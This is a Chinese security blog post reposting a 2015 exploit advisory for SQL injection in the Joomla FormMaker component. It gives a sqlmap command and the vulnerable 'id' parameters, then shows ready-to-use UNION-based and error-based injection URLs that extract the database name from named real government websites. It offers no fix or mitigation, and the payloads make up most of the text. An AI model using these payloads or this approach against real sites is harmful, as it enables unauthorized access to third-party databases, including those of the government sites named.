Joomla FormMaker组件注入漏洞

使用说明:

python sqlmap.py -u "http://localhost/index.php?option=com_formmaker&view=formmaker&id=-5653&Itemid=45" --dbs 
######################################################################
# Exploit Title: Joomla FormMaker Component - SQL Injection Vulnerability
# Google Dork: Y0ur Brain
# Date: 28.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://extensions.joomla.org/extension/form-maker
# Tested on: Windows
######################################################################

# Exploit : index.php?option=com_formmaker&view=formmaker&id=-5653 {SQLi}&Itemid=45
#           index.php?option=com_formmaker&task=paypal_info&tmpl=component&id=-1 {SQLi}

# ~ Demo ~ # $>

# Example :
# Type: MySQL UNION query (NULL) - with 28 columns
# URI: http://www.cabinet.gov.zm/index.php?option=com_formmaker&view=formmaker&id=-5653 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707671,IFNULL(CAST(database() AS CHAR),0x20),0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Itemid=45

# Other Example :
# Type: error-based
# URI: http://www.ppsppa.gov.my/index.php/ms/?option=com_formmaker&view=formmaker&id=1 AND (SELECT 4784 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x71706b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=837

# sh00t5 To SQL_master 😀

本文固定链接: https://www.unhonker.com/bug/1707.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年03月29日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Joomla FormMaker组件注入漏洞 | 90' s Blog|关注网络信息安全
关键字:

Joomla FormMaker组件注入漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!